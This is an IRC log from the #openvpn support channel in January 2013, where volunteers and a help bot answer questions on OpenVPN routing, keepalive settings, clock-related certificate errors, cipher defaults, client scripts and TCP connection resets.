(!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for 17:14 <@vpnHelper> a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 17:14 <@krzee> done. 17:15 <@krzee> you dont need to push any routes to the client 17:15 <@krzee> unless you want other clients to access this clients lan as well 17:16 <@krzee> bbl, back to work 17:16 < wykydtron> krzee: thank you. Nope, only want clients to the server :] I will look this over. 17:16 <@krzee> yw 17:20 -!- brute11k1 [~brute11k@89.249.231.124] has quit [Quit: Leaving.] 17:21 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 17:24 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Ping timeout: 276 seconds] 17:30 -!- rocco1 [~rocco@2001:4dd0:fd53:101:1d09:eea4:2a2:3f7] has quit [Ping timeout: 245 seconds] 17:47 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Read error: Connection reset by peer] 17:56 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 17:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:56 < Changos> Hello guys 17:57 < Changos> I have a OpenBSD server with OpenVPN, and I'll like connect this with clients on Cisco Linksys RV042, is this possible ? 17:58 < Changos> the type connection is point to point 18:01 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:03 < pekster> Changos: OpenWRT and similar projects are able to run openvpn, as long as the hardware supports the requirements for the embedded distribution and has enough flash memory and RAM (8M flash and 32M RAM is a good minimum to shoot for. I've done openwrt+openvpn with less before, but it's not fun) 18:05 -!- b1rkh0ff [~b1rkh0ff@31.176.147.137] has quit [Read error: Connection reset by peer] 18:15 < Changos> pekster: cool, long time I hear about OpenWRT, but I don't know it OpenWRT. I need get Firewall, web filter, load balancing, dhcp server, NAT, and VPN on same device 18:19 -!- rocco [~rocco@ip-109-90-212-13.unitymediagroup.de] has joined #openvpn 18:26 < sam1> wndr3800 is pretty neat with openwrt 18:27 -!- PryMar56 [~prymar@cpe-98-149-139-90.socal.res.rr.com] has quit [Ping timeout: 245 seconds] 18:33 -!- rocco [~rocco@ip-109-90-212-13.unitymediagroup.de] has left #openvpn [] 18:42 < Azrael_-> if a vpn-connection fails (e.g. routing temporarily down), does openvpn try to reestablish the connection? how often is it tried? how long does it wait between the tries? 18:42 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 18:49 < pekster> Azrael_-: See the --keepalive option and the related raw directives --ping, --ping-restart, and --ping-exit 18:50 <@krzee> !keepalive 18:50 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 18:53 < pekster> Always taking the easy way :P 18:54 < Changos> I got it ! :D, I'll use mikrotik device, this can use with OpenVPN :P 18:57 <@krzee> whoa, you're the second person this week to mention that device 19:00 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn 19:09 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 19:19 -!- u0m3 [~Radu@92.80.109.202] has quit [Quit: Leaving] 19:27 -!- Changos [~Changos@unaffiliated/changos] has quit [Remote host closed the connection] 19:30 -!- adolfomaltez [~taro@190.62.205.158] has joined #openvpn 19:31 -!- mufasa27 [~mufasa@unaffiliated/mufasa27] has joined #openvpn 19:32 < mufasa27> How can I tunnel openvpn to only work with individual terminal shells? As in: use a terminal shell through vpn while still keeping other applications (web browsing) confined to local network? 19:34 -!- u0m3 [~Radu@92.80.109.202] has joined #openvpn 19:34 < pekster> mufasa27: OpenVPN creates a tun or tap adapter. Unless you change your routing, that shouldn't have an impact on applications that don't use a route created when you establish a new connection 19:35 < mufasa27> pekster: hey! thanks for the help earlier this morning! got everything up and running. :) 19:36 < mufasa27> pekster: so I should already have the applications running through eth0 that need to be accessing eth0; before I create tun0? then anything after that will use tun0? 19:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 19:37 < pekster> mufasa27: It doesn't matter if you connect things before or after. Simply creating a new network won't "hijack" your other traffic, *unless* you've specifically told OpenVPN to route networks (or the whole Internet) through your VPN connection 19:37 -!- mode/#openvpn [+v pekster] by ChanServ 19:37 < mufasa27> pekster: How would I check if that is the case or not? 19:38 <+pekster> Look at your logs or your routing table? 19:38 < mufasa27> I don't have a routing table currently 19:38 <+pekster> OpenVPN is worthless on a system without networking. If you have networking support, you have a routing table 19:38 <+pekster> !101 19:38 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 19:39 <+pekster> Maybe you want a more beginner's guide to how tcp/ip works? 19:39 <+pekster> !tcpip 19:39 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 19:40 < mufasa27> ok, thank you. 19:40 <+pekster> OpenVPN isn't really going to be useful if you don't have a pretty good handling on concepts like routes, gateways, and CIDR/netmask notation 19:40 < mufasa27> Using it to develop at work from home. Don't know hardly anything about networking. Sorry for offtopic questions 19:42 <+pekster> We focus on using and configuring openvpn, and less on 'how routing works' here. OpenVPN can pass hosts, networks (like your work network range) or even "all of the Internet" through the tunnel. I don't know how your setup is since I haven't seen it. You'd need to look at your logs and routing table to know 19:43 <+pekster> 'ip route show' will likely provide you clues how this is set up. Some basic guides online can guide you throgh understanding what that output means if that's an issue 19:43 < mufasa27> pekster: thank you. And thank you for the help earlier on setting up my vpn 19:44 <+pekster> Yea, I'm not sure if it's a systemic issues with poor systemd support, or perhaps more likely something not well with your setup. I don't see the benefit of using a series of userland tools for the task of entering a password :\ 19:46 -!- adolfomaltez [~taro@190.62.205.158] has quit [Ping timeout: 272 seconds] 19:46 < mufasa27> pekster: haha yeah true. I had to downgrade to an older version of openvpn instead of version 2.3 I had to use 2.2.2 in order for it to work correctly with systemd. rc.d just worked before and now everything had to change. 19:47 -!- adolfomaltez [~taro@190.62.246.31] has joined #openvpn 19:52 -!- mete [~mete@84.200.83.33] has quit [Ping timeout: 248 seconds] 19:54 -!- mete [~mete@mete.shell.la] has joined #openvpn 20:07 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 20:07 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 20:07 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:07 -!- mode/#openvpn [+o krzee] by ChanServ 20:07 -!- mufasa27 [~mufasa@unaffiliated/mufasa27] has left #openvpn [] 21:30 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 272 seconds] 21:31 -!- baobei [~baobei@180.155.14.35] has joined #openvpn 21:31 < baobei> hey 21:31 < baobei> getting strange error in log 21:31 < baobei> http://pastebin.ca/2308821 21:32 < baobei> basically get that over and over in a loop 21:32 -!- mete [~mete@mete.shell.la] has joined #openvpn 21:32 < baobei> it was working fine yesterday didnt touch anything 21:32 <+pekster> Line 4 21:32 <@krzee> ntpdate time.nist.gov 21:33 < rob0> I'd use CC.pool.ntp.org, FWIW 21:33 < rob0> (where CC is your country code) 21:33 <@krzee> i only know 2 by heart 21:33 <@krzee> ill try to remember that tho 21:34 < rob0> Fri Jun 08 :) 21:34 <+pekster> Just wait 7 months :P 21:35 < baobei> just can't see any reason why i'd get that error when i didn't change anything 21:35 < rob0> oh crap. My CA is expiring in a bit over a month. 21:35 <@krzee> doh! 21:35 < baobei> rob0, lol was it at the default 3500 days? 21:35 < rob0> I think I made it for 5 years. 21:36 < rob0> next one will be ten. Then I will be certain to forget everything I knew! 21:36 < baobei> probably openvpn wasn't even around 10 years ago 21:37 < rob0> Initial release 1.1.0 / April 10, 2002 21:37 < baobei> wow even back then 21:37 <@krzee> ovpn1 didnt use pki tho ;] 21:37 < rob0> I was using it back in '04, but not using servers until much later. 21:38 < baobei> back then i was like 6 or 7 21:42 < baobei> im thinkin it might be a bug 21:42 < baobei> my certs are all valid 21:49 < rob0> um, "Fri Jun 08" is the date in your logs. What timezone is UTC-7months? :) 21:50 < rob0> I'm thinking it's exactly as krzee and pekster pointed out: your system clock is wrong! 21:50 < baobei> takes 7 months for the light to reach earth from the planet i live 21:50 < rob0> ah, cool 21:51 < rob0> So 6 or 7 of your planet's years are what, 35-40 Earth years? 21:54 -!- baobei_ [~baobei@192.73.252.248] has joined #openvpn 21:54 -!- baobei [~baobei@180.155.14.35] has quit [Read error: Connection reset by peer] 21:54 < baobei_> yes 21:54 < baobei_> changing time fixed it 21:54 < baobei_> but weirdly wiindows aero stopped working and won't come back lol 21:57 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds] 21:59 -!- MeanderingCode_ [~Meanderin@71.213.164.111] has joined #openvpn 22:01 -!- baobei_ [~baobei@192.73.252.248] has quit [Ping timeout: 276 seconds] 22:02 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 252 seconds] 22:04 -!- colo-work [~jt@78.142.138.4] has quit [Ping timeout: 248 seconds] 22:05 -!- colo-work [~jt@78.142.138.4] has joined #openvpn 22:06 -!- colo-work [~jt@78.142.138.4] has quit [Excess Flood] 22:07 -!- cosmicgate [~root@108.166.200.61] has joined #openvpn 22:07 -!- colo-work [~jt@78.142.138.4] has joined #openvpn 22:31 -!- fling [~fling@fsf/member/fling] has left #openvpn [] 23:32 < EugeneKay> That's windows. 23:40 -!- MeanderingCode_ [~Meanderin@71.213.164.111] has quit [Remote host closed the connection] 23:43 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 23:57 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] --- Day changed Wed Jan 30 2013 00:09 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 245 seconds] 00:10 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 00:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 00:20 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 252 seconds] 00:35 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 00:43 -!- adolfomaltez [~taro@190.62.246.31] has quit [Ping timeout: 276 seconds] 00:43 -!- adolfomaltez [~taro@190.62.223.6] has joined #openvpn 00:49 -!- Devastator- is now known as Devastator 00:51 -!- adolfomaltez [~taro@190.62.223.6] has quit [Ping timeout: 272 seconds] 00:51 -!- adolfomaltez [~taro@190.62.253.3] has joined #openvpn 00:57 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 01:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 01:30 -!- master_of_master [~master_of@p57B545F7.dip.t-dialin.net] has quit [Ping timeout: 244 seconds] 01:31 -!- master_of_master [~master_of@p57B54CF7.dip.t-dialin.net] has joined #openvpn 01:37 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 01:44 -!- u0m3_ [~Radu@92.80.97.231] has joined #openvpn 01:47 -!- u0m3 [~Radu@92.80.109.202] has quit [Ping timeout: 272 seconds] 01:51 -!- ade_b [~Ade@37.250.188.230.bredband.tre.se] has joined #openvpn 01:51 -!- ade_b [~Ade@37.250.188.230.bredband.tre.se] has quit [Changing host] 01:51 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:01 -!- voxadam [~voxadam@76.14.255.37] has joined #openvpn 02:02 < voxadam> I just started reading about OpenVPN and I was wondering why Blowfish is chosen as the default cipher over AES. 02:02 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:03 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 02:06 < cosmicgate> because we love fish 02:09 < voxadam> Well, AES is Twofish so wouldn't that make AES a better choice? 02:09 -!- jherek [~jherek@154.51.136.41] has joined #openvpn 02:09 -!- csaba [~csaba@195.199.154.25] has quit [Quit: Távozom] 02:09 < jherek> Hi there... I have a problem running openvpngui, it crashes when I try to connect to my vpn service... It is strange, as yesterday it worked flawlessly... 02:10 -!- adolfomaltez [~taro@190.62.253.3] has quit [Remote host closed the connection] 02:10 -!- brute11k [~brute11k@89.249.235.65] has joined #openvpn 02:15 < ||arifaX> I have a server 2.0.9-4etch1 with a config where clients do not need a certificate (we use OTP and I am aware of the security problems). I have a client 2.1_rc20 i686-pc-mingw32 [SSL] [LZO2] [PKCS11], it does not work with our previous config (working with older client), any ideas or help? 02:15 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 264 seconds] 02:16 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:19 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 02:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 02:24 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:25 -!- jherek [~jherek@154.51.136.41] has quit [Quit: leaving] 02:47 -!- cosmicgate-- [~root@113.210.101.118] has joined #openvpn 02:47 -!- cosmicgate-- [~root@113.210.101.118] has quit [Client Quit] 02:48 -!- cosmicgate [~root@108.166.200.61] has quit [Ping timeout: 240 seconds] 02:57 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 03:05 -!- brute11k1 [~brute11k@89.249.235.234] has joined #openvpn 03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:07 -!- brute11k [~brute11k@89.249.235.65] has quit [Ping timeout: 248 seconds] 03:11 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:22 -!- brute11k1 [~brute11k@89.249.235.234] has quit [Ping timeout: 256 seconds] 03:23 -!- brute11k [~brute11k@89.249.230.56] has joined #openvpn 03:24 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:39 -!- voxadam [~voxadam@76.14.255.37] has quit [] 03:55 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 04:02 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 04:03 -!- dazo_afk is now known as dazo 04:10 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 252 seconds] 04:13 -!- zz_AsadH is now known as AsadH 04:14 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 04:21 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 04:21 -!- mode/#openvpn [+o plaisthos] by ChanServ 04:35 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 04:36 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 04:44 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 04:44 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 04:50 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 04:50 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 04:59 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds] 05:00 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:01 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Read error: Connection reset by peer] 05:14 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 05:19 -!- bigmeow [~mirror@184.82.217.174] has quit [Read error: Connection reset by peer] 05:30 -!- brute11k1 [~brute11k@89.249.231.243] has joined #openvpn 05:32 -!- brute11k [~brute11k@89.249.230.56] has quit [Ping timeout: 276 seconds] 05:37 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 05:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 05:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 05:51 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Read error: Connection reset by peer] 05:55 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 06:11 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 06:11 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:25 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.] 06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit] 06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 06:33 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Client Quit] 06:34 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 06:56 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 06:59 -!- u0m3 [~Radu@109.96.166.88] has joined #openvpn 07:00 -!- u0m3_ [~Radu@92.80.97.231] has quit [Ping timeout: 255 seconds] 07:02 < stephan48> hi i am currently using iroue(ccd file) and route(openvpn serverconfig file), to make a subnet behind the client accessible, is it possible to add routes(route commands) for client subnets without restarting the openvpn server(as done in the main config) on the fly? i would rather not do that when a bunch of clients is connected 07:04 < SpookZA> ccd files are read upon client connect - so if you kill the client, they will re-connect after 120 seconds (default) and the new values in the ccd will be published to them ... as far as I know, routes in the main config need a restart - ymmv, I am just a user :) 07:11 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 07:16 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:18 -!- bauruine [~stefan@91.236.116.112] has quit [Remote host closed the connection] 07:24 -!- cpm [~Chip@pdpc/supporter/active/cpm] has quit [Quit: cpm] 07:33 < stephan48> SpookZA: jap that was my q, if theres a way around the restart 07:34 <@dazo> stephan48: add what's needed into the ccd ... and put the other routes in the normal config ... and then to avoid restarting openvpn (if only routing changes) ... set up the routes manually with 'route' or 'ip route' 07:34 < stephan48> ah ok 07:35 <@dazo> openvpn reads the --route statements and execute a 'route' or 'ip route' command for each of these config lines 07:35 < stephan48> thanks for the help! 07:35 < stephan48> good to know 07:38 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 07:56 -!- defswork [~andy@141.0.50.105] has joined #openvpn 08:20 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 272 seconds] 08:28 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 08:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 08:40 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 248 seconds] 08:43 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn 08:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:53 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 09:00 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 09:02 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds] 09:06 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 09:07 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 09:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 09:16 -!- u0m3 [~Radu@109.96.166.88] has quit [Read error: Operation timed out] 09:17 -!- u0m3 [~Radu@92.80.121.78] has joined #openvpn 09:17 -!- brute11k1 [~brute11k@89.249.231.243] has quit [Ping timeout: 245 seconds] 09:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 09:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 09:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 09:28 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 264 seconds] 09:30 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn 09:43 -!- brute11k [~brute11k@89.249.230.219] has joined #openvpn 10:04 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has quit [Ping timeout: 264 seconds] 10:04 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 10:06 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 264 seconds] 10:06 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 272 seconds] 10:09 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:09 -!- Shadowized [~Shadowize@st0p.trying.to.trac3.me] has joined #openvpn 10:09 -!- mete [~mete@mete.shell.la] has joined #openvpn 10:14 -!- brute11k [~brute11k@89.249.230.219] has quit [Ping timeout: 255 seconds] 10:19 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:22 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 10:24 -!- AsadH is now known as zz_AsadH 10:29 -!- sauce_ is now known as sauce 10:29 -!- sauce [sauce@ool-ad02ad20.dyn.optonline.net] has quit [Changing host] 10:29 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 10:31 -!- brute11k [~brute11k@89.249.230.219] has joined #openvpn 10:39 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 10:49 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Read error: Connection reset by peer] 10:49 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn 10:53 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:09 -!- zz_AsadH is now known as AsadH 11:10 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 11:12 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has joined #openvpn 11:16 -!- Winston_Smith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 11:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 11:18 -!- Winston_Smith is now known as WinstonSmith 11:18 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:18 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:19 -!- Porkepix [~Porkepix@157.138.191.181] has joined #openvpn 11:19 -!- JoeyJoeJo [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has joined #openvpn 11:19 -!- Porkepix [~Porkepix@157.138.191.181] has quit [Client Quit] 11:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:21 -!- bwallen [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has joined #openvpn 11:22 < bwallen> I have two openvpn servers. One is just a backup in case the first one goes down and each client has both IP addresses in their config files. The clients are always connected. I want to know if for some reason a client failed to connect to the primary server on ping restart and connected to the secondary. Can I do that via an up script? 11:23 -!- JoeyJoeJo [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has left #openvpn [] 11:26 < dioz> what? 11:27 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 11:28 < bwallen> I want to be notified if a client connects to my backup openvpn server rather than the primary 11:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 11:28 < bwallen> I can write a script to do that, I just don't know if specifying my script as an "up" script in the client's config will execute it on ping-restart 11:29 < bwallen> I had an incident where my primary openvpn server was up, but on ping-restart a client timed out when trying to reconnect so it automatically connected to the secondary server 11:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 11:32 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 252 seconds] 11:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 11:33 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 11:35 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 11:37 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:37 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:37 -!- mode/#openvpn [+o krzee] by ChanServ 11:39 -!- toky [~toky@wsip-174-77-152-130.dc.dc.cox.net] has joined #openvpn 11:40 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has left #openvpn [] 11:42 -!- Orbi [~opera@anon-185-20.vpn.ipredator.se] has joined #openvpn 11:46 <@dazo> bwallen: there's no script-hook if the connection fails ... if that's what you ask about .... anyhow, --up might be too early for your .... you might need --route-up 11:47 <@dazo> (--up is run before a connection is attempted) 11:47 < bwallen> Ah, I didn't know about route-up. Thanks 11:48 * dazo just looked at the man page 11:48 <@dazo> seems you can use --up ... but you need to play with --up-delay and --up-restart too then probably 11:54 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn 11:59 -!- AsadH is now known as zz_AsadH 12:00 -!- jthunder [~jthunder@70.28.245.44] has joined #openvpn 12:09 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:20 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 12:23 -!- jthunder_ [~jthunder@70.28.245.44] has joined #openvpn 12:25 -!- jthunder [~jthunder@70.28.245.44] has quit [Ping timeout: 248 seconds] 12:25 -!- jthunder_ is now known as jthunder 12:30 -!- mndo_ [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 12:31 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 246 seconds] 12:31 -!- jthunder [~jthunder@70.28.245.44] has quit [Quit: jthunder] 12:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 12:31 -!- mndo_ [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection] 12:32 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection] 12:32 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 12:36 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Client Quit] 12:38 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn 12:42 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:46 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 12:47 -!- u0m3 [~Radu@92.80.121.78] has quit [Read error: Connection reset by peer] 12:50 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds] 12:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 12:51 -!- u0m3 [~Radu@92.80.118.157] has joined #openvpn 12:53 -!- syoma [~syoma@186.34.232.222] has joined #openvpn 12:53 < syoma> hello guys 12:54 < syoma> I have problem with tunnelblick client 12:54 < syoma> http://pastebin.com/HddC2mWm 12:54 < syoma> Jan 30 11:26:36 fw1 openvpn[40497]: fernando.ormeno/190.44.118.93:53761 send_push_reply(): safe_cap=960 12:55 < syoma> Jan 30 11:36:24 fw1 openvpn[40497]: fernando.ormeno/190.44.118.93:53761 Connection reset, restarting [0] 12:55 < syoma> Jan 30 11:26:34 fw1 openvpn[40497]: fernando.ormeno/190.44.118.93:53761 MULTI_sva: pool returned IPv4=192.168.22.18, IPv6=48f4:1e01:800:0:2300:: 12:55 < syoma> somebody 12:55 < syoma> can help me pease 12:55 < |Mike|> read the topic mkay. 12:56 < |Mike|> || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably your firewall, Really || 12:56 < syoma> hi |Mike| 12:58 < syoma> all other clients work 12:58 < syoma> correctly 12:58 < syoma> that particular user has the problem 12:58 < |Mike|> firewalll! 12:59 < syoma> I want to ensure if the problem is the server or the client 12:59 < syoma> The sere runs on a box of pfsense 12:59 < syoma> s/sere/server 13:00 < syoma> the user connects to an adsl 13:00 < syoma> the user did a telnet to port and responds well 13:01 < syoma> :¬@ 13:01 <+pekster> As the log says, the connection was reset 13:01 <+pekster> Are you using tcp? 13:01 <+pekster> (as the encapsulating protocol) 13:01 < syoma> affirmative sr 13:02 <+pekster> So the peer reset the connection, and the server simply tears it down 13:02 <+pekster> You're better off using UDP, unless you actaully need TCP for some reason: 13:02 <+pekster> !tcp 13:02 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. 